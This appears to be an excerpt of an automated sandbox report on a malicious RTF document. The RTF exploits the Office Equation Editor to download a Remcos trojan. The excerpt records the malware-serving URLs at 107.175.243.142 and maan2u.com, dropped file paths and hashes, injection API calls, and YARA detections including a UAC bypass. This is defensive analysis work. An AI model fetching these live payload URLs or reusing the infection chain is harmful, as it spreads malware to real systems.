                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80

                  Networking

                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: Malware configuration extractorURLs: https://maan2u.com/doc/233_Qzzgbhhaaml
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Sep 2024 07:43:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 25 Sep 2024 00:08:41 GMTETag: "109c00-622e66ca7c781"Accept-Ranges: bytesContent-Length: 1088512Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnk
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: TMVADS-APTM-VADSDCHostingMY TMVADS-APTM-VADSDCHostingMY
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: global trafficHTTP traffic detected: GET /doc/233_Qzzgbhhaaml HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: maan2u.com
                  Source: global trafficHTTP traffic detected: GET /340/audiodg.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.243.142Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.175.243.142
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92722C27-8B95-4B62-9DF9-92A5A0127A04}.tmp
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: maan2u.com
                  Source: EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.243.142/340/audiodg.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.243.142/340/audiodg.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.243.142/340/audiodg.exellC:
                  Source: audiodg.exe, 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402737811.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                  Source: audiodg.exe, 00000005.00000002.401375610.000000000DB73000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/doc/233_Qzzgbhhaaml
                  Source: audiodg.exe, 00000005.00000002.398958656.00000000006E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/doc/233_QzzgbhhaamlKd
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR

                  System Summary

                  Source: K0hpP6V2fo.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\audiodg.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D58730 NtQueueApcThread,17_2_02D58730
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57A2C NtAllocateVirtualMemory,17_2_02D57A2C
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D5DD70 NtOpenFile,NtReadFile,NtClose,17_2_02D5DD70
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57D78 NtWriteVirtualMemory,17_2_02D57D78
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57AC9 NtAllocateVirtualMemory,17_2_02D57AC9
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57A2A NtAllocateVirtualMemory,17_2_02D57A2A
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D5F7C8 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,17_2_02D5F7C8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E9DF72_2_008E9DF7
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D420C417_2_02D420C4
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\audiodg.exe 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Qzzgbhha.PIF 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 02D44860 appears 683 times
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 02D446D4 appears 155 times
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 02D5894C appears 50 times
                  Source: K0hpP6V2fo.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
